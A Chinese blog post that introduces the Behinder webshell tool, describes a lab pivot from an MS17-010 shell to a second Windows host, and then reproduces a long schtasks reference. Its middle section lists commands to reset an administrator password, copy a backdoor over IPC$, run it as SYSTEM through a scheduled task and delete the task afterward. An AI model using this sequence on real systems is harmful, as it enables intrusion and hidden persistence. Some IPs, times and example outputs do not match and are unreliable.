1.冰蝎介绍
冰蝎是一款目前比较流行的Webshell管理工具,在2021年更新的2021.4.20 v3.0 Beta 9 版本中去除了动态密钥协商机制,采用预共享密钥,载荷全程无明文。因其优秀的加密传输特性,被攻击者广泛采用。冰蝎相较其它Webshell管理工具,具备如下优点:支持跨平台运行、多采用加密传输、版本更新频繁等。目前冰蝎已更新到2021.4.20 v3.0 Beta 9 ,新版本增加了Java内存马注入、支持多种Web容器、反向DMZ等功能。
2.实验
通过获取内网中的主机shell,上传木马,再通过内网主机之间建立IPC$通道实现内网横向移动,并通过windows定时任务执行,获取反弹shell
环境:
kali: 192.168.4.157
win7A:192.168.4.129 1.1.1.10
win7B:1.1.1.11
首先通过ms17-010获取内网win7A的shell
通过获得的shell,与WIN7B建立IPC$通道,
生成远程木马
上传木马到WIN7A
进入win7A的shell通过ipc$通道上传木马至win7B
设置payload进行本地监听此木马,等待反向连接,通过schtasks命令来执行木马
由于环境出了问题,因为上传的.exe因系统权限,没能成功执行,后期可以上传一些ps,或者其他shell,来获取目标系统的shell,整个人麻木了,这是啥呀。。。。。。。
知识补充:
1.IPC$简介
IPC$(Internet Process Connection)是共享"命名管道"的资源,它是为了让进程间通信而开放的命名管道,通过提供可信任的用户名和口令,连接双方可以建立安全的通道并以此通道进行加密数据的交换,从而实现对远程计算机的访问。
1.开放了139、445端口;
2.目标开启ipc$文件共享;
3.获取用户账号密码。
此测试前提是获取了ipc$,
这里测试的时候得到的权限是system,然后创建了一个admin账户,给了administrators权限,但无法复制文件过去,于是就改了administrator账户密码(实战中不建议更改,可读取管理密码后再用读到的密码)。
更改密码:net user administrator "1qaz@WSX"
1.连接目标ipc$,将后门复制到目标机器上
net use \193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
copy plugin_update.exe \193.168.1.12\c$\windows\temp\plugin_update.exe
2.创建自动任务,执行上传的后门程序
net time \193.168.1.12
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 16:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
接收端的目标机器已上线。
# 1.连接
net use \\193.168.1.12\ipc$ /user:administrator "1qaz@WSX"
# 2.查看连接情况
net use
# 3.查看目标主机共享资源
net view \\193.168.1.12
# 4.查看目标主机时间
net time \\193.168.1.12
# 5.查看目标主机的NetBIOS用户(自己本机也需开启)
nbtstat -A 193.168.1.12
# 6.删除连接
net use \\193.168.1.12\ipc$ /del
# 7.文件上传下载
copy plugin_update.exe \\193.168.1.12\c$\windows\temp\plugin_update.exe
(上传到目标的:c\windows\temp\目录下)
copy \\127.0.0.1\c$\test.exe c:\
(下载到本地c盘下)
# 8.创建计划任务
schtasks /create /tn "plugin_update" /tr c:\windows\temp\plugin_update.exe /sc once /st 1 6:32 /S 193.168.1.12 /RU System /u administrator /p "1qaz@WSX"
# 9.立即执行计划任务
schtasks /run /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
# 10.删除计划任务
schtasks /F /delete /tn "plugin_update" /S 193.168.1.12 /u administrator /p "1qaz@WSX"
2.schtasks简介
schtasks create 创建新的计划任务。
schtasks /create /tn TaskName /tr TaskRun /sc schedule [/mo modifier] [/d day] [/m month[,month…] [/i IdleTime] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]] /?
/tn TaskName 指定任务的名称。
/tr TaskRun 指定任务运行的程序或命令。键入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。
如果忽略该路径,SchTasks.exe 将假定文件在 Systemroot\System32 目录下。
/sc schedule 指定计划类型。有效值为 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY、ONCE、ONSTART、ONLOGON、ONIDLE。
值说明
MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY
指定计划的时间单位。
ONCE
任务在指定的日期和时间运行一次。
ONSTART
任务在每次系统启动的时候运行。可以指定启动的日期,或下一次系统启动的时候运行任务。
ONLOGON
每当用户(任意用户)登录的时候,任务就运行。可以指定日期,或在下次用户登录的时候运行任务。
ONIDLE
只要系统空闲了指定的时间,任务就运行。可以指定日期,或在下次系统空闲的时候运行任务。
/mo modifier
指定任务在其计划类型内的运行频率。这个参数对于 MONTHLY 计划是必需的。对于 MINUTE、HOURLY、DAILY 或 WEEKLY 计划,这个参数有效,但也可选。默认值为 1。
计划类型
修饰符
说明
MINUTE
1 ~ 1439
任务每 n 分钟运行一次。
HOURLY
1 ~ 23
任务每 n 小时运行一次。
DAILY
1 ~ 365
任务每 n 天运行一次。
WEEKLY
1 ~ 52
任务每 n 周运行一次。
MONTHLY
1 ~ 12
任务每 n 月运行一次。
LASTDAY
任务在月份的最后一天运行。
FIRST、SECOND、THIRD、FOURTH、LAST
与 /d day 参数共同使用,并在特定的周和天运行任务。例如,在月份的第三个周三。
/d dirlist
指定周或月的一天。只与 WEEKLY 或 MONTHLY 计划共同使用时有效。
计划类型
日期值
WEEKLY
可选项。有效值是 MON ~ SUN 和 * (每一天)。MON 是默认值。
MONTHLY
在使用 FIRST、SECOND、THIRD、FOURTH 或 LAST 修饰符 (/mo) 时,需要 MON ~ SUN 中的某个值。1 ~ 31 是可选的,只在没有修饰符或修饰符为 1 ~ 12 类型时有效。默认值是 1 (月份的第一天)。
/m month[,month…]
指定一年中的一个月。有效值是 JAN ~ DEC 和 * (每个月)。/m 参数只对于 MONTHLY 计划有效。在使用 LASTDAY 修饰符时,这个参数是必需的。否则,它是可选的,默认值是 * (每个月)。
/i InitialPageFileSize
指定任务启动之前计算机空闲多少分钟。键入一个 1 ~ 999 之间的整数。这个参数只对于 ONIDLE 计划有效,而且是必需的。
/st StartTime
以 HH:MM:SS 24 小时格式指定时间。默认值是命令完成时的当前本地时间。/st 参数只对于 MINUTE、HOURLY、DAILY、WEEKLY、MONTHLY 和 ONCE 计划有效。它只对于 ONCE 计划是必需的。
/sd StartDate
以 MM/DD/YYYY 格式指定任务启动的日期。默认值是当前日期。/sd 参数对于所有的计划有效,但只对于 ONCE 计划是必需的。
/ed EndDate
指定任务计划运行的最后日期。此参数是可选的。它对于 ONCE、ONSTART、ONLOGON 或 ONIDLE 计划无效。默认情况下,计划没有结束日期。
/s Computer
指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/ru {[_Domain_\]_User_ | "System"}
使用指定用户帐户的权限运行任务。默认情况下,使用用户登录到运行 SchTasks 的计算机上的权限运行任务。
值
说明
[_domain_\}User?
指定用户帐户。
"System" 或 ""
指定操作系统使用的 NT Authority\System 帐户。
/p Password
指定用户帐户的密码,该用户帐户在 /u 参数中指定。如果在指定用户帐户的时候忽略了这个参数,SchTasks.exe 会提示您输入密码而且不显示键入的文本。使用 NT Authority\System 帐户权限运行的任务不需要密码,SchTasks.exe 也不会提示索要密码。
/?
在命令提示符显示帮助。
XOX
若要查看该命令语法,请单击以下命令:
schtasks /create /tn TaskName /tr TaskRun /sc minute [/mo {1 - 1439}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划安全脚本 Sec.vbs 每 20 分钟运行一次。由于命令没有包含起始日期或时间,任务在命令完成 20 分钟后启动,此后每当系统运行它就每 20 分钟运行一次。请注意,安全脚本源文件位于远程计算机上,但任务在本地计算机上计划并执行。
schtasks /create /sc minute /mo 20 /tn "Security Script" /tr \\central\data\scripts\sec.vbs
作为响应,SchTasks.exe 显示一条消息来说明任务会以当前用户的权限运行并需要当前用户的密码。输入密码时,SchTasks.exe 不显示键入的文本。
The task will be created under current logged-in user name. Please enter the password ************
然后 SchTasks.exe 显示一条消息表明已计划该任务:
成功:计划任务 "Security Script" 已成功创建。
查询显示命令计划的任务:
TaskName Next Run Time Status ========================= ======================== ============== Security Script 10:50:00 AM , 4/4/2001
schtasks /create /tn TaskName /tr TaskRun /sc hourly [/mo {1 - 365}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令将计划 MyApp 程序从午夜过后五分钟起每小时运行一次。因为忽略了 /mo 参数,命令使用了小时计划的默认值,即每 (1) 小时。如果该命令在 12:05 A.M 之后生成,程序将在第二天才会运行。
schtasks /create /sc hourly /st 00:05:00 /tn "My App" /tr c:\apps\myapp.exe
下面的命令计划 MyApp 程序从 2001 年 3 月的第一天起每五小时运行一次。它使用 /mo 参数来指定间隔时间,使用 /sd 参数来指定起始日期。由于命令没有指定起始时间,当前时间被用作起始时间。
schtasks /create /sc hourly /mo 5 /sd 03/01/2001 /tn "My App" /tr c:\apps\myapp.exe
schtasks /create /tn TaskName /tr TaskRun /sc daily [/mo {1 - 365}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的范例计划 MyApp 程序在每天的 8:00 A.M. 运行一次,直到 2001 年 12 月 31 日结束。由于它忽略了 /mo 参数,所以使用默认间隔 1 来每天运行命令。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc daily /st 08:00:00 /ed 12/31/2001
下面的范例计划 MyApp 程序从 2001 年 12 月 31 日起每隔一天在 1:00 P.M. (13:00) 运行。命令使用 /mo 参数来指定两 (2) 天的间隔。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc daily /mo 2 /st 13:00:00 /sd 12/31/2001
schtasks /create /tn TaskName /tr TaskRun /sc weekly [/d {MON - SUN | *}] [/mo {1 - 52}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划 MyApp 程序在远程计算机上每六周运行一次。该命令使用 /mo 参数来指定间隔。它也使用 /s 参数来指定远程计算机,使用 /ru 参数来计划任务以用户的 Administrator 帐户权限运行。因为忽略了 /rp 参数,SchTasks.exe 会提示用户输入 Administrator 帐户密码。
另外,因为命令是远程运行的,所以命令中所有的路径,包括到 MyApp.exe 的路径,都是指向远程计算机上的路径。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc weekly /mo 6 /s Server16 /ru Admin01
下面的命令计划任务每隔一周在周五运行。它使用 /mo 参数来指定两周的间隔,使用 /d 参数来指定是一周内的哪一天。如计划任务在每个周五运行,要忽略 /mo 参数或将其设置为 1。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc weekly /mo 2 /d FRI
常规月计划语法
schtasks /create /tn TaskName /tr TaskRun /sc monthly [/mo {FIRST | SECOND | THIRD | FOURTH | LAST | LASTDAY] [/d {MON - SUN | 1 - 31}] [/m {JAN - DEC[,JAN - DEC…] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
指定周的语法
schtasks /create /tn TaskName /tr TaskRun /sc monthly /mo {FIRST | SECOND | THIRD | FOURTH | LAST} /d {MON - SUN} [/m {JAN - DEC[,JAN - DEC…] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
Lastday 语法
schtasks /create /tn TaskName /tr TaskRun /sc monthly /mo LASTDAY /m {JAN - DEC[,JAN - DEC…] | *} [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
指定日期的语法
schtasks /create /tn TaskName /tr TaskRun /sc monthly /d {1 - 31} [/m {JAN - DEC[,JAN - DEC…] | *}] [/st StartTime] [/sd StartDate] [/ed EndDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划 MyApp 程序在每月的第一天运行。因为默认修饰符是 none(即:没有修饰符),默认天是第一天,默认的月份是每个月,所以该命令不需要任何其它的参数。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly
下面的命令计划 MyApp 程序在每月的最后一天运行。它使用 /mo 参数指定在每月的最后一天运行程序,使用通配符 (*) 与 /m 参数表明在每月的最后一天运行程序。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /mo lastday /m *
下面的命令计划 MyApp 程序每三个月运行一次。.它使用 /mo 参数来指定间隔。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /mo 3
下面的命令计划 MyApp 程序在每月的第二个周日运行。它使用 /mo 参数指定是每月的第二周,使用 /d 参数指定天。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /mo SECOND /d SUN
下面的命令计划 MyApp 程序在五月 15 日和六月 15 日的 3:00 PM (15:00) 运行。它使用 /d 参数来指定日期,使用 /m 参数指定月份。它也使用 /st 参数来指定开始时间。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /d 15 /m MAY,JUN /st 15:00:00
schtasks /create /tn TaskName /tr TaskRun /sc once /st StartTime /sd StartDate [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划 MyApp 程序在 2002 年 1 月 1 日午夜运行一次。它使用 /ru 参数指定以用户的 Administrator 帐户权限运行任务,使用 /rp 参数为 Administrator 帐户提供密码。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc once /st 00:00:00 /sd 01/01/2002 /ru Admin23 /rp p@ssworD1
schtasks /create /tn TaskName /tr TaskRun /sc onstart [/sd StartDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划 MyApp 程序在每次系统启动的时候运行,起始日期是 2001 年 3 月 15 日。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc onstart /sd 03/15/2001
schtasks /create /tn TaskName /tr TaskRun /sc onlogon [/sd StartDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划批处理文件在用户(任何用户)每次登录到远程计算机上的时候运行。它使用 /s 参数指定远程计算机。因为命令是远程的,所以命令中所有的路径,包括批处理文件的路径,都指定为远程计算机上的路径。
schtasks /create /tn "Start Web Site" /tr c:\myiis\webstart.bat /sc onlogon /s Server23
schtasks /create /tn TaskName /tr TaskRun /sc onidle /iIdleTime [/sd StartDate] [/s computer [/u [_domain_\]_user_ /p password]] [/ru {[_Domain_\]_User_ | "System"} [/rp Password]]
下面的命令计划 MyApp 程序在计算机空闲的时候运行。它使用必需的 /i 参数指定在启动任务之前计算机必需持续空闲十分钟。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc onidle /i 10
若要查看范例,请单击范例名称:
下面的命令计划 MyApp 程序以 NT Authority\System 帐户权限运行。在这个范例中,任务计划在每月的第一天运行,但对于以系统权限运行的任务可以使用所有的计划类型。
该命令使用 /ru "System" 参数指定系统安全上下文。因为系统任务不需要密码,所以忽略了 /rp 参数。
schtasks /create /tn "My App" /tr c:\apps\myapp.exe /sc monthly /d 1 /ru "System"
作为响应,SchTasks.exe 显示一个信息性消息和一个成功消息。它不提示输入密码。
信息:此任务将被创建于用户名下 ("NT AUTHORITY\SYSTEM")。 成功:计划任务 "My App" 已成功创建。
每个任务只能运行一个程序。但是可以创建一个运行多个程序的批处理文件,然后计划一个任务来运行该批处理文件。下面的过程说明了这个方法:
创建一个启动要运行程序的批处理文件。
在这个范例中创建了一个启动“事件查看器”(Eventvwr.exe) 和“系统监视器”(Perfmon.exe) 的批处理文件。
启动文本编辑器,例如“记事本”。
键入每个程序的名称和指向可执行文件的完全合格的路径。在这种情况下,文件包含有下列语句。
C:\Windows\System32\Eventvwr.exe
C:\Windows\System32\Perfmon.exe
将文件存储为 MyApps.bat。
使用 SchTasks.exe 创建一个运行 MyApps.bat 的任务。
下面的命令创建了 Monitor 任务,每当有人登录它就运行。它使用 /tn 参数命名任务,使用 /tr 参数运行 MyApps.bat。它使用 /sc 参数来指明 OnLogon 计划类型,使用 /ru 参数指定 Administrator 帐户。
schtasks /create /tn Monitor /tr C:\MyApps.bat /sc onlogon /ru Reskit\Administrator
该命令的结果是,每当用户登录到计算机,任务就启动“事件查看器”和“系统监视器”。
更改一个或多个下列任务属性。
schtasks /change /tn TaskName [/s computer [/u [_domain_\]_user_ /p password]] [/tr TaskRun] [/ru [_Domain_\]_User_ | "System"] [/rp Password]
/tn TaskName
标识要更改的任务。输入任务名。
/s Computer
指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/tr TaskRun
更改任务运行的程序。输入可执行文件、脚本文件或批处理文件的完全合格的路径和文件名。如果忽略了路径,SchTasks.exe 假定文件在 Systemroot\System32 目录下指定的程序替换任务最初运行的程序。
/ru [_Domain_\]_User_ | "System"
更改用于任务的用户帐户。
值
说明
[_domain_\]_User_
指定用户帐户
"System" or ""
指定为操作系统所使用的 NT Authority\System 帐户。
在更改用户帐户的时候,必须也要更改用户密码。如果命令带有 /ru 参数,但没有 /rp 参数,SchTasks.exe 提示要求输入新的密码而且不显示键入的文本。
任务以不需要密码的 NT Authority\System 帐户权限运行,SchTasks.exe 不会提示输入密码。
/p Password
更改用于任务的帐户密码。输入新的密码。
/?
在命令提示符显示帮助。
XOX
下面的命令将 Virus Check 任务运行的程序由 VirusCheck.exe 更改为 VirusCheck2.exe。此命令使用 /tn 参数标识任务,使用 /tr 参数指定任务的新程序。(不能更改任务名称。)
schtasks /change /tn "Virus Check" /tr C:\VirusCheck2.exe
作为响应,SchTasks.exe 显示以下成功消息:
成功:计划任务 "Virus Check" 的参数已更改。
此命令的结果是,Virus Check 任务现运行 VirusCheck2.exe。
下面的命令更改用于远程计算机 Svr01 上 RemindMe 任务的用户帐户密码。命令使用 /tn 参数标识任务,使用 /s 参数指定远程计算机。它使用 /rp 参数指定新的密码 p@ssWord3。
在用户帐户密码过期或更改的时候需要此过程。如果存储在任务中的密码无效,那么任务不会运行。
schtasks /change /tn RemindMe /s Svr01 /rp p@ssWord3
作为响应,SchTasks.exe 显示以下成功消息:
成功:计划任务 "RemindMe" 的参数已更改。
这个命令的结果是,RemindMe 任务现在以其初始的用户帐户运行,但拥有一个新密码。
下面的命令更改任务运行的程序以及任务运行的用户帐户。实质上,它将旧的计划用于新的任务。这个命令将每天早上 9:00 a.m. 启动 "Notepad.exe" 的 Notepad 任务更改为启动 "Internet Explorer"。
该命令使用 /tn 参数来标识任务。它使用 /tr 参数更改任务运行的程序,使用 /ru 参数更改任务运行凭据的用户帐户。
忽略为用户帐户提供密码的 /rp 参数。必须为帐户提供密码,但可以使用 /rp 参数以及在明文中键入密码,或等待 SchTasks.exe 要求输入密码的提示,然后以不显示文本的方式输入密码。
schtasks /change /tn Notepad /tr "c:\program files\Internet Explorer\iexplore.exe" /ru DomainX\Admin01
作为响应,SchTasks.exe 索要用于用户帐户的密码。它不显示键入的文本,因此密码不可见。
Please enter the password for DomainX\Admin01: *********
请注意,/tn 参数标识任务,/tr 和 /ru 参数更改任务的属性。不能使用另外一个参数来标识任务,而且不能更改任务的名称。
作为响应,SchTasks.exe 显示以下成功消息:
成功:计划任务 "Notepad" 的参数已更改。
这个命令的结果是:RemindMe 任务现在以其初始的用户帐户运行,但拥有一个新密码。
下面的命令更改了 SecurityScript 任务以使其以 NT Authority\System 帐户权限运行。它使用 /ru "" 参数来表示 System 帐户。
schtasks /change /tn SecurityScript /ru ""
作为响应,SchTasks.exe 显示以下成功消息:
成功:计划任务 "SecurityScript" 的参数已更改。
因为任务以 System 帐户权限运行不需要密码,所以 SchTasks.exe 不提示输入密码。
立即运行计划任务。run 操作忽略计划,但使用程序文件位置、用户帐户和存储在任务中的密码立即运行任务。
schtasks /run /tn TaskName [/s computer [/u [_domain_\]_user_ /p password]] /?
/tn TaskName
标识任务。该参数是必需的。
/s Computer
指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/?
在命令提示符显示帮助。
XOX
下面的命令启动 "Security Script" 任务。
schtasks /run /tn "Security Script"
作为响应,SchTasks.exe 启动与任务相关联的脚本并显示以下消息:
成功:计划任务 "Security Script" 正在运行 ...
下面的命令在远程计算机 Svr01 上运行 Update 任务:
schtasks /run /tn Update /s Svr01
此时,SchTasks.exe 显示以下错误消息:
错误:无法运行计划任务 "Update"。
查看 Svr01 上的 “计划任务程序”事务日志 C:\Windows\SchedLgU.txt 以获取错误的原因。在这种情况下,日志中显示以下条目:
"Update.job" (update.exe) 3/26/2001 1:15:46 PM ** ERROR ** The attempt to log on to the account associated with the task failed, therefore, the task did not run. The specific error is 0x8007052e:Logon failure:unknown user name or bad password. Verify that the task's Run-as name and password are valid and try again.
显然,任务中的用户名或密码在此系统中无效。下面的 schtasks /change 命令为 Svr01 上的 Update 任务更新用户名和密码:
schtasks /change /tn Update /s Svr01 /ru Administrator /rp PassW@rd3
在 change 命令完成之后,重新运行 run 命令。这一次,Update.exe 程序启动,SchTasks.exe 显示以下消息:
错误:无法运行计划任务 "Update"。
终止由任务启动的程序
schtasks /end /tn TaskName [/s computer [/u [_domain_\]_user_ /p password]] /?
/tn TaskName
标识启动程序的任务。该参数是必需的。
/s Computer
指定远程计算机(带有或者没有反斜杠)的名称或 IP 地址。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/?
显示帮助。
XOX
下面的命令终止由 My Notepad 任务启动的 Notepad 实例:
schtasks /end /tn "My Notepad"
作为响应,SchTasks.exe 终止了由任务启动的 Notepad 实例并显示以下成功消息:
成功:计划任务 "My Notepad" 已成功终止。
下面的命令终止远程计算机 Svr01 上由 InternetOn 任务启动的 Internet Explorer 实例:
schtasks /end /tn InternetOn /s Svr01
作为响应,SchTasks.exe 停止由任务启动的 Internet Explorer 实例并显示以下成功消息:
成功:计划任务 "Update" 正在运行...
删除计划任务
schtasks /delete /tn {TaskName | *} [/f] [/s computer [/u [_domain_\]_user_ /p password]] [/?]
/tn {TaskName | *}
标识要删除的任务。该参数是必需的。
值
说明
TaskName
删除已命名任务。
*
删除计算机上的所有计划任务。
/f
阻止确认消息。不警告就删除任务。
/s Computer
指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/?
在命令提示符显示帮助。
XOX
下面的命令从远程计算机上的计划表中删除 "Start Mail" 任务。它使用 /s 参数来标识远程计算机。
schtasks /delete /tn "Start Mail" /s Svr16
作为响应, SchTasks.exe 显示以下确认消息。要删除任务,请键入 y。要取消命令,请键入 n:
警告您确定要删除任务 "Start Mail" 吗 (Y/N )? y 成功:已成功删除计划任务 "Start Mail"。
下面的命令从本地计算机的计划表中删除所有的任务,包括由其它用户计划的任务。它使用 /tn * 参数代表计算机上所有的任务,使用/f 参数取消确认消息。
schtasks /delete /tn * /f
作为响应,SchTasks.exe 显示以下成功消息以表明只删除了计划任务 SecureScript。
成功:计划任务 "SecureScript" 已成功删除。
显示计划在计算机上运行的所有任务,包括那些由其它用户计划的任务。
schtasks [/query] [/fo {TABLE | LIST | CSV}] [/nh] [/v] [/s computer [/u [_domain_\]_user_ /p password]]
[/query]
操作名称可选。键入不带任何参数的 schtasks 来执行查询。
/fo {TABLE|LIST|CSV}
指定输出格式。TABLE 为默认值。
/nh
忽略表格显示中的列标题。此参数与 TABLE 和 CSV 输出格式共同使用时有效。
/v
将任务的高级属性添加到显示中。
使用 /v 的查询应该格式化成 LIST 或 CSV。
/s Computer
指定远程计算机的名称或 IP 地址(带有或者没有反斜杠)。默认值是本地计算机。
/u [_domain_\]_user_
使用特定用户帐户的权限运行命令。默认情况下,使用已登录到运行 SchTasks 的计算机上的用户的权限运行命令。
/p password
指定在 /u 参数中指定的用户帐户的密码。如果使用 /u 参数,则需要该参数。
/?
在命令提示符显示帮助。
XOX
下面的命令显示为本地计算机计划的所有任务。这些命令得到的结果相同,并可以交换使用。
schtasks
schtasks /query
作为响应,SchTasks.exe 以默认的简单表格格式显示任务,如下表所示:
TaskName Next Run Time Status ========================= ======================== ============== Microsoft Outlook At logon time SecureScript 14:42:00 PM , 2/4/2001
下面的命令要求详细的显示本地计算机上的任务。它使用 /v 参数来请求详细显示,使用 /fo LIST 参数来将显示格式化成易于阅读的列表。这个命令可以用来验证创建的任务有预期的循环模式。
schtasks /query /fo LIST /v
作为响应,SchTasks.exe 显示所有任务的详细属性列表。下面的显示给出了一个计划在每月最后一个周五的 4:00 A.M. 运行的任务的列表:
HostName:RESKIT01 TaskName:SecureScript Next Run Time:4:00:00 AM , 3/30/2001 Status:Not yet run Last Run Time:Never Last Result: 0 Creator:user01 Schedule:At 4:00 AM on the last Fri of every month, starting 3/24/2001 Task To Run:: C:\WINDOWS\system32\notepad.exe Start In:notepad.exe Comment:N/A Scheduled Task State:Enabled Scheduled Type:Monthly Modifier:Last FRIDAY Start Time4:00:00 AM Start Date: 3/24/2001 End Date:N/A Days:FRIDAY Months:JAN、FEB、MAR、APR、MAY、JUN、JUL、AUG、SEP、OCT、NOV、DEC Run As User:RESKIT\user01 Delete Task If Not Rescheduled:Enabled Stop Task If Runs X Hours and X Mins: 72:0 Repeat:Until Time:Disabled Repeat:Repeat:Disabled Repeat:Stop If Still Running: Disabled Idle: Start Time(For IDLE Scheduled Type): Disabled Idle: Only Start If Idle for X Minutes: Disabled Idle:If Not Idle Retry For X Minutes: Disabled Idle: Stop Task If Idle State End: Disabled Power Mgmt: No Start On Batteries: Disabled Power Mgmt:Stop On Battery Mode: Disabled
下面的命令请求为远程计算机计划的任务列表,并将任务添加到本地计算机中以逗号分隔的日志文件中。此命令的格式可以用来收集和跟踪为多个计算机计划的任务。
命令使用 /s 参数标识远程计算机 Reskit16,使用 /fo 参数指定格式,使用 /nh 参数取消列标题。>> 附加符号将输出重定向到本地计算机 Svr01 上的任务日志 p0102.csv。因为命令在远程计算机上运行,所以本地计算机路径必须是完全合格的。
schtasks /query /s Reskit16 /fo csv /nh >> \\svr01\data\tasklogs\p0102.csv
作为响应,SchTasks.exe 会把为计算机 Reskit16 计划的任务添加到本地计算机 Svr01 上的 p0102.csv 文件中。
SchTasks.exe 执行的操作类似于“控制面板”中“计划任务”中的操作。可以使用两种工具中的任一种来创建、删除、配置或显示计划任务。
键入不带任何参数的 schtasks 执行查询。
用户必须是命令起作用的计算机上的 Administrators 组的成员。
要确认计划运行或要找出计划不运行的原因,请查看“任务计划”服务事务日志 Systemroot\SchedLgU.txt。该日志记录了由包括“计划任务”和 SchTasks.exe 在内的所有使用该服务的工具启动的尝试运行。
损坏任务文件的情况极少发生。已损坏文件不会运行。在已损坏任务上试图执行某项操作时,SchTasks.exe 显示以下错误消息:
错误:数据非法。
已损坏任务无法恢复。要恢复系统的计划任务特征,请使用 SchTasks.exe 或“计划任务”从系统中删除任务并重新计划。
SchTasks.exe 取代了包含在 Windows 早期版本中的工具 At.exe。
feiyue3008
手机扫一扫
移动阅读更方便
你可能感兴趣的文章